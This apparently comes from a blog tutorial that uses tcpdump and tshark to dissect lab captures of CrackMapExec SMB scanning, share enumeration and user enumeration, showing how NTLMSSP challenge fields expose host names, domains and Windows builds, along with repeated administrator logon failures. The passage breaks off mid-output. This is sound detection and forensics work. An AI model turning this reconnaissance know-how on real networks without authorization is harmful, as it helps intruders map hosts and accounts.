Here is the tcpdump filter which was configured to capture the traffic. The "-w" will change as I will have each crackmapexec command in its own pcap.
root@securitynik:~# tcpdump -nnvvi eth0 'not port (9997 or 8089 or 8191 or 8000 or 8065 or 68 or 67)' -w cme-scan.pcap
Now that we have the file named "cme-scan.pcap", let's perform our packet analysis on this.
As always, when running tshark (or wireshark) one of the first things we should do is look at the protocol statistics. We can achieve this as follows:
root@securitynik:~# tshark -n -r cme-scan.pcap -z io,phs -q =================================================================== Protocol Hierarchy Statistics Filter: eth frames:1570 bytes:72502 arp frames:1521 bytes:64188 ip frames:49 bytes:8314 tcp frames:48 bytes:8244 nbss frames:28 bytes:6940 smb frames:3 bytes:381 smb2 frames:25 bytes:6559 icmp frames:1 bytes:70 ===================================================================
Let's look into the TCP traffic by first looking at the conversations
root@securitynik:~# tshark -n -r cme-scan.pcap -z conv,tcp -q ================================================================================ TCP Conversations Filter:<No Filter> | <- | | -> | | Total | Relative | Duration | | Frames Bytes | | Frames Bytes | | Frames Bytes | Start | | 10.0.0.100:34564 <-> 10.0.0.105:445 9 1598 10 1166 19 2764 10.223046000 10.5146 10.0.0.100:39670 <-> 10.0.0.3:445 6 1669 8 1030 14 2699 7.135418000 0.0369 10.0.0.100:50874 <-> 10.0.0.103:445 6 1677 8 1030 14 2707 7.174715000 0.0219 10.0.0.100:50838 <-> 10.0.0.2:445 0 0 1 74 1 74 7.135206000 0.0000 ================================================================================
Interestingly in the results returned from crackmapexec, there are 3 hosts in the results. However, above we see 4 conversations with port 445. Let's remove the bottom one as it returns a total of 74 bytes, while the top 3 has over 1000 bytes.
To make this a bit easier on ourselves, let's leverage a tshark filter that only focuses on the first conversation with source port 34564 and destination port 445.
root@securitynik:~# tshark -n -r cme-scan.pcap -Y "(tcp.port == 34564) and (tcp.port == 445)" 388 10.223046 10.0.0.100 → 10.0.0.105 TCP 74 34564 → 445 [SYN] Seq=0 Win=29200 Len=0 MSS=1460 SACK_PERM=1 TSval=2851720854 TSecr=0 WS=128 391 10.223405 10.0.0.105 → 10.0.0.100 TCP 66 445 → 34564 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460 WS=256 SACK_PERM=1 392 10.223423 10.0.0.100 → 10.0.0.105 TCP 54 34564 → 445 [ACK] Seq=1 Ack=1 Win=29312 Len=0 395 10.224501 10.0.0.100 → 10.0.0.105 SMB 127 Negotiate Protocol Request 399 10.225553 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response 400 10.225566 10.0.0.100 → 10.0.0.105 TCP 54 34564 → 445 [ACK] Seq=74 Ack=253 Win=30336 Len=0 420 10.231080 10.0.0.100 → 10.0.0.105 SMB2 164 Negotiate Protocol Request 421 10.231694 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response 444 10.238197 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE 446 10.238929 10.0.0.105 → 10.0.0.100 SMB2 409 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE 447 10.243642 10.0.0.100 → 10.0.0.105 SMB2 235 Session Setup Request, NTLMSSP_AUTH, User: \ 448 10.244629 10.0.0.105 → 10.0.0.100 SMB2 139 Session Setup Response 449 10.247201 10.0.0.100 → 10.0.0.105 SMB2 126 Session Logoff Request 450 10.247610 10.0.0.105 → 10.0.0.100 SMB2 126 Session Logoff Response 452 10.279539 10.0.0.105 → 10.0.0.100 TCP 126 [TCP Retransmission] 445 → 34564 [PSH, ACK] Seq=945 Ack=595 Win=2101760 Len=72 453 10.279577 10.0.0.100 → 10.0.0.105 TCP 66 34564 → 445 [ACK] Seq=595 Ack=1017 Win=32512 Len=0 SLE=945 SRE=1017 1565 20.735709 10.0.0.100 → 10.0.0.105 TCP 54 34564 → 445 [FIN, ACK] Seq=595 Ack=1017 Win=32512 Len=0 1566 20.736058 10.0.0.105 → 10.0.0.100 TCP 60 445 → 34564 [ACK] Seq=1017 Ack=596 Win=2101760 Len=0 1567 20.737597 10.0.0.105 → 10.0.0.100 TCP 60 445 → 34564 [RST, ACK] Seq=1017 Ack=596 Win=0 Len=0
Now that we have the above, we have an insight into what the communication looks like. We can see the TCP 3-way handshake has been completed and then we see the SMB session negotiated and processed, followed by the TCP connection being gracefully terminated.
Now if we were to look into the "Session Setup Response Message" for the NTLMSSP_NEGOTIATE (Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE), as shown in record number 446, we should be able to gather information into how crackmapexec was able to determine the operating system, etc. Let's take a look at specific fields in the "Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE" packet to bring some clarity into this. Let's also adjust our tshark filter, to now only look at traffic coming back from the 3 devices found, while ignoring the ICMP frame. We will revisit the 1521 frames which show up in the protocol hierarchy shortly, but work with me for now.
root@securitynik:~# tshark -n -r cme-scan.pcap -Y "(tcp.srcport == 445) && !(icmp)" 11 7.135744 10.0.0.3 → 10.0.0.100 TCP 66 445 → 39670 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460 WS=256 SACK_PERM=1 14 7.137411 10.0.0.3 → 10.0.0.100 SMB2 506 Negotiate Protocol Response 39 7.145265 10.0.0.3 → 10.0.0.100 SMB2 506 Negotiate Protocol Response 63 7.154134 10.0.0.3 → 10.0.0.100 SMB2 401 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE 87 7.163947 10.0.0.3 → 10.0.0.100 SMB2 130 Session Setup Response, Error: STATUS_ACCESS_DENIED 111 7.172290 10.0.0.3 → 10.0.0.100 TCP 60 445 → 39670 [RST, ACK] Seq=1328 Ack=579 Win=0 Len=0 122 7.174930 10.0.0.103 → 10.0.0.100 TCP 66 445 → 50874 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460 WS=256 SACK_PERM=1 125 7.182170 10.0.0.103 → 10.0.0.100 SMB2 506 Negotiate Protocol Response 128 7.185537 10.0.0.103 → 10.0.0.100 SMB2 506 Negotiate Protocol Response 130 7.189042 10.0.0.103 → 10.0.0.100 SMB2 409 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE 132 7.194414 10.0.0.103 → 10.0.0.100 SMB2 130 Session Setup Response, Error: STATUS_ACCESS_DENIED 134 7.196617 10.0.0.103 → 10.0.0.100 TCP 60 445 → 50874 [RST, ACK] Seq=1336 Ack=579 Win=0 Len=0 391 10.223405 10.0.0.105 → 10.0.0.100 TCP 66 445 → 34564 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460 WS=256 SACK_PERM=1 399 10.225553 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response 421 10.231694 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response 446 10.238929 10.0.0.105 → 10.0.0.100 SMB2 409 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE 448 10.244629 10.0.0.105 → 10.0.0.100 SMB2 139 Session Setup Response 450 10.247610 10.0.0.105 → 10.0.0.100 SMB2 126 Session Logoff Response 452 10.279539 10.0.0.105 → 10.0.0.100 TCP 126 [TCP Retransmission] 445 → 34564 [PSH, ACK] Seq=945 Ack=595 Win=2101760 Len=72 1566 20.736058 10.0.0.105 → 10.0.0.100 TCP 60 445 → 34564 [ACK] Seq=1017 Ack=596 Win=2101760 Len=0 1567 20.737597 10.0.0.105 → 10.0.0.100 TCP 60 445 → 34564 [RST, ACK] Seq=1017 Ack=596 Win=0 Len=0
As we can see from above, we have a few response packets from the hosts at 10.0.0.3, 10.0.0.103 and 10.0.0.105. These matches with what crackmapexec found so far. let's now look into the specific fields to show how it learned the information it displayed. Before looking at the specific fields, let's take record number 446 and expand it to see some of the fields.
root@securitynik:~# tshark -n -r cme-scan.pcap -Y "(frame.number == 446)" -T text -V Frame 446: 409 bytes on wire (3272 bits), 409 bytes captured (3272 bits) Encapsulation type: Ethernet (1) Arrival Time: Apr 7, 2019 23:12:40.690090000 EDT [Time shift for this packet: 0.000000000 seconds] Epoch Time: 1554693160.690090000 seconds [Time delta from previous captured frame: 0.000516000 seconds] [Time delta from previous displayed frame: 0.000000000 seconds] [Time since reference or first frame: 10.238929000 seconds] Frame Number: 446 Frame Length: 409 bytes (3272 bits) Capture Length: 409 bytes (3272 bits) [Frame is marked: False] [Frame is ignored: False] [Protocols in frame: eth:ethertype:ip:tcp:nbss:smb2:gss-api:spnego:ntlmssp] Ethernet II, Src: 08:00:27:d1:1c:e7, Dst: 08:00:27:ac:14:9c Destination: 08:00:27:ac:14:9c Address: 08:00:27:ac:14:9c .... ..0. .... .... .... .... = LG bit: Globally unique address (factory default) .... ...0 .... .... .... .... = IG bit: Individual address (unicast) Source: 08:00:27:d1:1c:e7 Address: 08:00:27:d1:1c:e7 .... ..0. .... .... .... .... = LG bit: Globally unique address (factory default) .... ...0 .... .... .... .... = IG bit: Individual address (unicast) Type: IPv4 (0x0800) Internet Protocol Version 4, Src: 10.0.0.105, Dst: 10.0.0.100 0100 .... = Version: 4 .... 0101 = Header Length: 20 bytes (5) Differentiated Services Field: 0x00 (DSCP: CS0, ECN: Not-ECT) 0000 00.. = Differentiated Services Codepoint: Default (0) .... ..00 = Explicit Congestion Notification: Not ECN-Capable Transport (0) Total Length: 395 Identification: 0x515e (20830) Flags: 0x4000, Don't fragment 0... .... .... .... = Reserved bit: Not set .1.. .... .... .... = Don't fragment: Set ..0. .... .... .... = More fragments: Not set ...0 0000 0000 0000 = Fragment offset: 0 Time to live: 128 Protocol: TCP (6) Header checksum: 0x9342 [validation disabled] [Header checksum status: Unverified] Source: 10.0.0.105 Destination: 10.0.0.100 Transmission Control Protocol, Src Port: 445, Dst Port: 34564, Seq: 505, Ack: 342, Len: 355 Source Port: 445 Destination Port: 34564 [Stream index: 3] [TCP Segment Len: 355] Sequence number: 505 (relative sequence number) [Next sequence number: 860 (relative sequence number)] Acknowledgment number: 342 (relative ack number) 0101 .... = Header Length: 20 bytes (5) Flags: 0x018 (PSH, ACK) 000. .... .... = Reserved: Not set ...0 .... .... = Nonce: Not set .... 0... .... = Congestion Window Reduced (CWR): Not set .... .0.. .... = ECN-Echo: Not set .... ..0. .... = Urgent: Not set .... ...1 .... = Acknowledgment: Set .... .... 1... = Push: Set .... .... .0.. = Reset: Not set .... .... ..0. = Syn: Not set .... .... ...0 = Fin: Not set [TCP Flags: ·······AP···] Window size value: 8211 [Calculated window size: 2102016] [Window size scaling factor: 256] Checksum: 0x10ec [unverified] [Checksum Status: Unverified] Urgent pointer: 0 [SEQ/ACK analysis] [This is an ACK to the segment in frame: 444] [The RTT to ACK the segment was: 0.000732000 seconds] [iRTT: 0.000377000 seconds] [Bytes in flight: 355] [Bytes sent since last PSH flag: 355] [Timestamps] [Time since first frame in this TCP stream: 0.015883000 seconds] [Time since previous frame in this TCP stream: 0.000732000 seconds] TCP payload (355 bytes) NetBIOS Session Service Message Type: Session message (0x00) Length: 351 SMB2 (Server Message Block Protocol version 2) SMB2 Header Server Component: SMB2 Header Length: 64 Credit Charge: 1 NT Status: STATUS_MORE_PROCESSING_REQUIRED (0xc0000016) Command: Session Setup (1) Credits granted: 1 Flags: 0x00000001, Response .... .... .... .... .... .... .... ...1 = Response: This is a RESPONSE .... .... .... .... .... .... .... ..0. = Async command: This is a SYNC command .... .... .... .... .... .... .... .0.. = Chained: This pdu is NOT a chained command .... .... .... .... .... .... .... 0... = Signing: This pdu is NOT signed .... .... .... .... .... .... .000 .... = Priority: This pdu does NOT contain a PRIORITY1 ...0 .... .... .... .... .... .... .... = DFS operation: This is a normal operation ..0. .... .... .... .... .... .... .... = Replay operation: This is NOT a replay operation Chain Offset: 0x00000000 Message ID: Unknown (2) Process Id: 0x00000000 Tree Id: 0x00000000 Session Id: 0x000048000000003d Signature: 00000000000000000000000000000000 [Response to: 444] [Time from request: 0.000732000 seconds] Session Setup Response (0x01) StructureSize: 0x0009 0000 0000 0000 100. = Fixed Part Length: 4 .... .... .... ...1 = Dynamic Part: True Session Flags: 0x0000 .... .... .... ...0 = Guest: False .... .... .... ..0. = Null: False .... .... .... .0.. = Encrypt: False Blob Offset: 0x00000048 Blob Length: 279 Security Blob: a18201133082010fa0030a0101a10c060a2b060104018237... GSS-API Generic Security Service Application Program Interface Simple Protected Negotiation negTokenTarg negResult: accept-incomplete (1) supportedMech: 1.3.6.1.4.1.311.2.2.10 (NTLMSSP - Microsoft NTLM Security Support Provider) responseToken: 4e544c4d53535000020000001600160038000000358289e2... NTLM Secure Service Provider NTLMSSP identifier: NTLMSSP NTLM Message Type: NTLMSSP_CHALLENGE (0x00000002) Target Name: SECURITYNIK Length: 22 Maxlen: 22 Offset: 56 Negotiate Flags: 0xe2898235, Negotiate 56, Negotiate Key Exchange, Negotiate 128, Negotiate Version, Negotiate Target Info, Negotiate Extended Security, Target Type Domain, Negotiate Always Sign, Negotiate NTLM key, Negotiate Seal, Negotia 1... .... .... .... .... .... .... .... = Negotiate 56: Set .1.. .... .... .... .... .... .... .... = Negotiate Key Exchange: Set ..1. .... .... .... .... .... .... .... = Negotiate 128: Set ...0 .... .... .... .... .... .... .... = Negotiate 0x10000000: Not set .... 0... .... .... .... .... .... .... = Negotiate 0x08000000: Not set .... .0.. .... .... .... .... .... .... = Negotiate 0x04000000: Not set .... ..1. .... .... .... .... .... .... = Negotiate Version: Set .... ...0 .... .... .... .... .... .... = Negotiate 0x01000000: Not set .... .... 1... .... .... .... .... .... = Negotiate Target Info: Set .... .... .0.. .... .... .... .... .... = Request Non-NT Session: Not set .... .... ..0. .... .... .... .... .... = Negotiate 0x00200000: Not set .... .... ...0 .... .... .... .... .... = Negotiate Identify: Not set .... .... .... 1... .... .... .... .... = Negotiate Extended Security: Set .... .... .... .0.. .... .... .... .... = Target Type Share: Not set .... .... .... ..0. .... .... .... .... = Target Type Server: Not set .... .... .... ...1 .... .... .... .... = Target Type Domain: Set .... .... .... .... 1... .... .... .... = Negotiate Always Sign: Set .... .... .... .... .0.. .... .... .... = Negotiate 0x00004000: Not set .... .... .... .... ..0. .... .... .... = Negotiate OEM Workstation Supplied: Not set .... .... .... .... ...0 .... .... .... = Negotiate OEM Domain Supplied: Not set .... .... .... .... .... 0... .... .... = Negotiate Anonymous: Not set .... .... .... .... .... .0.. .... .... = Negotiate NT Only: Not set .... .... .... .... .... ..1. .... .... = Negotiate NTLM key: Set .... .... .... .... .... ...0 .... .... = Negotiate 0x00000100: Not set .... .... .... .... .... .... 0... .... = Negotiate Lan Manager Key: Not set .... .... .... .... .... .... .0.. .... = Negotiate Datagram: Not set .... .... .... .... .... .... ..1. .... = Negotiate Seal: Set .... .... .... .... .... .... ...1 .... = Negotiate Sign: Set .... .... .... .... .... .... .... 0... = Request 0x00000008: Not set .... .... .... .... .... .... .... .1.. = Request Target: Set .... .... .... .... .... .... .... ..0. = Negotiate OEM: Not set .... .... .... .... .... .... .... ...1 = Negotiate UNICODE: Set NTLM Server Challenge: 67f26f829961c6cf Reserved: 0000000000000000 Target Info Length: 168 Maxlen: 168 Offset: 78 Attribute: NetBIOS domain name: SECURITYNIK Target Info Item Type: NetBIOS domain name (0x0002) Target Info Item Length: 22 NetBIOS Domain Name: SECURITYNIK Attribute: NetBIOS computer name: SECNIK-2K19 Target Info Item Type: NetBIOS computer name (0x0001) Target Info Item Length: 22 NetBIOS Computer Name: SECNIK-2K19 Attribute: DNS domain name: securitynik.local Target Info Item Type: DNS domain name (0x0004) Target Info Item Length: 34 DNS Domain Name: securitynik.local Attribute: DNS computer name: SECNIK-2K19.securitynik.local Target Info Item Type: DNS computer name (0x0003) Target Info Item Length: 58 DNS Computer Name: SECNIK-2K19.securitynik.local Attribute: Timestamp Target Info Item Type: Timestamp (0x0007) Target Info Item Length: 8 Timestamp: Apr 7, 2019 23:12:40.658449900 EDT Attribute: End of list Target Info Item Type: End of list (0x0000) Target Info Item Length: 0 Version 10.0 (Build 17763); NTLM Current Revision 15 Major Version: 10 Minor Version: 0 Build Number: 17763 NTLM Current Revision: 15
From above, we literally broke out all the fields for this packet. As you can see, a lot of this information which crackmapexec saw is already visible. Let's now prepare to wrap this part of it up by extracting those fields and presenting them in a more user-friendly manner.
root@securitynik:~# tshark -n -r cme-scan.pcap -Y "(ntlmssp.messagetype == 0x00000002)" -T fields -e ip.src -e tcp.srcport -e ip.dst -e tcp.dstport -e ntlmssp.identifier -e ntlmssp.challenge.target_name -e ntlmssp.challenge.target_info.nb_domain_name -e ntlmssp.version.major -e ntlmssp.version.build_number -E header=y ip.src tcp.srcport ip.dst tcp.dstport ntlmssp.identifier ntlmssp.challenge.target_name ntlmssp.challenge.target_info.nb_domain_name ntlmssp.version.major ntlmssp.version.build_number 10.0.0.3 445 10.0.0.100 39670 NTLMSSP SECURITYNIK-SYS SECURITYNIK-SYS 10 17763 10.0.0.103 445 10.0.0.100 50874 NTLMSSP SECURITYNIK-WIN SECURITYNIK-WIN 10 16299 10.0.0.105 445 10.0.0.100 34564 NTLMSSP SECURITYNIK SECURITYNIK 10 17763
Obviously, you should now try to extract some of the other fields that I did not include.
Before we go, if we remember when we looked at the protocol hierarchy, above there were ARP packets. Let's see what we can gather from these.
root@securitynik:~# tshark -n -r cme-scan.pcap -Y "(arp)" | wc --lines 1521
From above, it looks like we have 1521 ICMP messages. Let's see what is really going on here. To help us understand what is going on, let's once again, look into the fields and parse the information of interest out.
root@securitynik:~# tshark -n -r cme-scan.pcap -Y "(arp)" -T fields -e arp.src.hw_mac -e arp.src.proto_ipv4 -e arp.dst.proto_ipv4 -e arp.opcode -E header=y | more arp.src.hw_mac arp.src.proto_ipv4 arp.dst.proto_ipv4 arp.opcode 08:00:27:ec:69:d7 10.0.0.103 10.0.0.102 1 08:00:27:ec:69:d7 10.0.0.103 10.0.0.102 1 08:00:27:ec:69:d7 10.0.0.103 10.0.0.102 1 08:00:27:ec:69:d7 10.0.0.103 10.0.0.102 1 08:00:27:ec:69:d7 10.0.0.103 10.0.0.102 1 08:00:27:ac:14:9c 10.0.0.100 10.0.0.1 1 08:00:27:ac:14:9c 10.0.0.100 10.0.0.4 1 08:00:27:ac:14:9c 10.0.0.100 10.0.0.5 1 08:00:27:ac:14:9c 10.0.0.100 10.0.0.6 1 08:00:27:ac:14:9c 10.0.0.100 10.0.0.7 1 08:00:27:ac:14:9c 10.0.0.100 10.0.0.8 1 08:00:27:ac:14:9c 10.0.0.100 10.0.0.9 1 08:00:27:ac:14:9c 10.0.0.100 10.0.0.10 1 08:00:27:ac:14:9c 10.0.0.100 10.0.0.49 1 08:00:27:ac:14:9c 10.0.0.100 10.0.0.50 1 08:00:27:ac:14:9c 10.0.0.100 10.0.0.51 1 08:00:27:ac:14:9c 10.0.0.100 10.0.0.52 1 08:00:27:ac:14:9c 10.0.0.100 10.0.0.53 1 08:00:27:ac:14:9c 10.0.0.100 10.0.0.54 1 08:00:27:ac:14:9c 10.0.0.100 10.0.0.55 1 08:00:27:ac:14:9c 10.0.0.100 10.0.0.56 1 08:00:27:ac:14:9c 10.0.0.100 10.0.0.57 1 08:00:27:ac:14:9c 10.0.0.100 10.0.0.58 1 08:00:27:ac:14:9c 10.0.0.100 10.0.0.59 1 08:00:27:ac:14:9c 10.0.0.100 10.0.0.11 1 08:00:27:ac:14:9c 10.0.0.100 10.0.0.12 1 08:00:27:ac:14:9c 10.0.0.100 10.0.0.13 1 08:00:27:ac:14:9c 10.0.0.100 10.0.0.14 1 08:00:27:ac:14:9c 10.0.0.100 10.0.0.15 1 08:00:27:ac:14:9c 10.0.0.100 10.0.0.16 1 08:00:27:ac:14:9c 10.0.0.100 10.0.0.17 1 08:00:27:ac:14:9c 10.0.0.100 10.0.0.18 1 08:00:27:ac:14:9c 10.0.0.100 10.0.0.21 1 .... <truncated for brevity> ....
Let's now look at what the packets look like as CrackMapExec enumerates the shares
Let's once again start with looking at the protocol hierarchy
root@securitynik:~/cme# tshark -n -r cme-enum-shares.pcap -z io,phs -q =================================================================== Protocol Hierarchy Statistics Filter: eth frames:487 bytes:131203 arp frames:5 bytes:300 ip frames:482 bytes:130903 tcp frames:482 bytes:130903 nbss frames:394 bytes:115138 smb frames:8 bytes:1016 smb2 frames:386 bytes:114122 tcp.segments frames:2 bytes:2764 ===================================================================
From above we see both SMB and SMB2 conversations. I take that to mean that the conversation probably started on SMB1 the negotiated to SMB2.
Let's look into the conversations.
root@securitynik:~/cme# tshark -n -r cme-enum-shares.pcap -z conv,tcp -q ================================================================================ TCP Conversations Filter:<No Filter> | <- | | -> | | Total | Relative | Duration | | Frames Bytes | | Frames Bytes | | Frames Bytes | Start | | 10.0.0.100:35710 <-> 10.0.0.105:445 88 32754 95 19205 183 51959 4.701908000 1.3409 10.0.0.100:52026 <-> 10.0.0.103:445 77 32785 88 19170 165 51955 4.702229000 1.3245 10.0.0.100:41024 <-> 10.0.0.3:445 13 3322 17 3681 30 7003 4.778967000 1.2455 10.0.0.100:35716 <-> 10.0.0.105:445 14 2952 15 2945 29 5897 4.797176000 1.2259 10.0.0.100:52032 <-> 10.0.0.103:445 13 3074 15 2883 28 5957 5.162347000 0.8619 10.0.0.100:35708 <-> 10.0.0.105:445 8 1512 10 1154 18 2666 4.658157000 1.3651 10.0.0.100:41016 <-> 10.0.0.3:445 7 1729 8 1030 15 2759 4.657942000 0.1189 10.0.0.100:52018 <-> 10.0.0.103:445 6 1677 8 1030 14 2707 4.657751000 0.0437 ================================================================================
Let's do like the previous instance and look into one of the conversations. Let's take the first one with source port 35710.
root@securitynik:~/cme# tshark -n -r cme-enum-shares.pcap -Y "( ip.addr == 10.0.0.100 ) && ( ip.addr == 10.0.0.105 ) && ( tcp.port ==35710 ) && ( tcp.port == 445 )" | more 35 4.701908 10.0.0.100 → 10.0.0.105 TCP 74 35710 → 445 [SYN] Seq=0 Win=29200 Len=0 MSS=1460 SACK_PERM=1 TSval=2860773415 TSecr=0 WS=128 37 4.702292 10.0.0.105 → 10.0.0.100 TCP 66 445 → 35710 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460 WS=256 SACK_PERM=1 38 4.702307 10.0.0.100 → 10.0.0.105 TCP 54 35710 → 445 [ACK] Seq=1 Ack=1 Win=29312 Len=0 41 4.703211 10.0.0.100 → 10.0.0.105 SMB 127 Negotiate Protocol Request 44 4.706059 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response 45 4.706077 10.0.0.100 → 10.0.0.105 TCP 54 35710 → 445 [ACK] Seq=74 Ack=253 Win=30336 Len=0 48 4.709555 10.0.0.100 → 10.0.0.105 SMB2 164 Negotiate Protocol Request 49 4.710187 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response 52 4.719150 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE 53 4.719743 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE 56 4.728556 10.0.0.100 → 10.0.0.105 SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator 57 4.731502 10.0.0.105 → 10.0.0.100 SMB2 130 Session Setup Response, Error: STATUS_LOGON_FAILURE 59 4.734839 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE 62 4.736363 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE 63 4.753927 10.0.0.100 → 10.0.0.105 SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator 64 4.756372 10.0.0.105 → 10.0.0.100 SMB2 130 Session Setup Response, Error: STATUS_LOGON_FAILURE 68 4.760402 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE 69 4.761060 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE 72 4.772888 10.0.0.100 → 10.0.0.105 SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator 74 4.775421 10.0.0.105 → 10.0.0.100 SMB2 130 Session Setup Response, Error: STATUS_LOGON_FAILURE 76 4.778370 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE 78 4.779050 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE 81 4.786392 10.0.0.100 → 10.0.0.105 SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator 85 4.789841 10.0.0.105 → 10.0.0.100 SMB2 139 Session Setup Response 103 4.829145 10.0.0.105 → 10.0.0.100 TCP 139 [TCP Retransmission] 445 → 35710 [PSH, ACK] Seq=2313 Ack=3016 Win=2100736 Len=85 104 4.829160 10.0.0.100 → 10.0.0.105 TCP 66 35710 → 445 [ACK] Seq=3016 Ack=2398 Win=35712 Len=0 SLE=2313 SRE=2398 118 4.870576 10.0.0.100 → 10.0.0.105 SMB2 216 Encrypted SMB3 119 4.870976 10.0.0.105 → 10.0.0.100 SMB2 190 Encrypted SMB3 120 4.870995 10.0.0.100 → 10.0.0.105 TCP 54 35710 → 445 [ACK] Seq=3178 Ack=2534 Win=36736 Len=0 ........... 463 5.966266 10.0.0.105 → 10.0.0.100 SMB2 182 Encrypted SMB3 464 5.970495 10.0.0.100 → 10.0.0.105 SMB2 178 Encrypted SMB3 465 5.970824 10.0.0.105 → 10.0.0.100 SMB2 178 Encrypted SMB3 468 6.013389 10.0.0.100 → 10.0.0.105 TCP 54 35710 → 445 [ACK] Seq=14032 Ack=27752 Win=185856 Len=0 484 6.040763 10.0.0.100 → 10.0.0.105 TCP 54 35710 → 445 [FIN, ACK] Seq=14032 Ack=27752 Win=185856 Len=0 485 6.041096 10.0.0.105 → 10.0.0.100 TCP 60 445 → 35710 [ACK] Seq=27752 Ack=14033 Win=2102272 Len=0 486 6.042828 10.0.0.105 → 10.0.0.100 TCP 60 445 → 35710 [RST, ACK] Seq=27752 Ack=14033 Win=0 Len=0
Uh oh!! Looks like this communication is encrypted with SMB3. However, if you pay close attention above, we see a number of "STATUS_LOGON_FAILURE" for "SECURITYNIK\Administrator". Let's leave this for now. Do note also most of the other conversations are much the same.
Let's now transition to the enumeration of the users and groups, to see what we can learn from the packets.
Looking at the traffic from the user enumeration, if we start with the conversations, we see 10 conversations being reported in the pcap file. if we look at the first one with port 36662, we see this ties back into our log analysis. Let's take a look at these packets to see what we can learn.
root@securitynik:~/cme# tshark -n -r cme-enum-users.pcap -z conv,tcp -q ================================================================================ TCP Conversations Filter:<No Filter> | <- | | -> | | Total | Relative | Duration | | Frames Bytes | | Frames Bytes | | Frames Bytes | Start | | 10.0.0.100:36662 <-> 10.0.0.105:445 81 20594 78 18654 159 39248 9.171767000 1.2807 10.0.0.100:52980 <-> 10.0.0.103:445 58 15862 60 14173 118 30035 9.321117000 0.6187 10.0.0.100:36660 <-> 10.0.0.105:445 13 2714 15 2933 28 5647 9.060796000 1.3251 10.0.0.100:52978 <-> 10.0.0.103:445 13 3074 15 2887 28 5961 9.208452000 1.1786 10.0.0.100:36652 <-> 10.0.0.105:445 9 1638 10 1166 19 2804 8.944584000 1.5418 10.0.0.100:41964 <-> 10.0.0.3:445 7 1729 11 1451 18 3180 8.997733000 1.4911 10.0.0.100:52972 <-> 10.0.0.103:445 7 1746 11 1459 18 3205 8.998512000 1.4915 10.0.0.100:36656 <-> 10.0.0.105:445 8 1525 9 1409 17 2934 8.998254000 1.5223 10.0.0.100:52962 <-> 10.0.0.103:445 6 1677 8 1030 14 2707 8.944150000 0.0536 10.0.0.100:41960 <-> 10.0.0.3:445 6 1669 8 1030 14 2699 8.944373000 0.0425 ================================================================================
Looking at the actual packets now
root@securitynik:~/cme# tshark -n -r cme-enum-users.pcap -Y "( tcp.port == 36662 ) && ( tcp.port == 445 )" 109 9.171767 10.0.0.100 → 10.0.0.105 TCP 74 36662 → 445 [SYN] Seq=0 Win=29200 Len=0 MSS=1460 SACK_PERM=1 TSval=2872505954 TSecr=0 WS=128 110 9.172057 10.0.0.105 → 10.0.0.100 TCP 66 445 → 36662 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460 WS=256 SACK_PERM=1 111 9.172070 10.0.0.100 → 10.0.0.105 TCP 54 36662 → 445 [ACK] Seq=1 Ack=1 Win=29312 Len=0 113 9.180091 10.0.0.100 → 10.0.0.105 SMB 127 Negotiate Protocol Request 115 9.193928 10.0.0.105 → 10.0.0.100 TCP 60 445 → 36662 [ACK] Seq=1 Ack=74 Win=2102272 Len=0 130 9.223667 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response 131 9.223681 10.0.0.100 → 10.0.0.105 TCP 54 36662 → 445 [ACK] Seq=74 Ack=253 Win=30336 Len=0 135 9.230843 10.0.0.100 → 10.0.0.105 SMB2 164 Negotiate Protocol Request 143 9.256814 10.0.0.105 → 10.0.0.100 TCP 60 445 → 36662 [ACK] Seq=253 Ack=184 Win=2102272 Len=0 193 9.550036 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response 196 9.554980 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE 197 9.557240 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE 200 9.572289 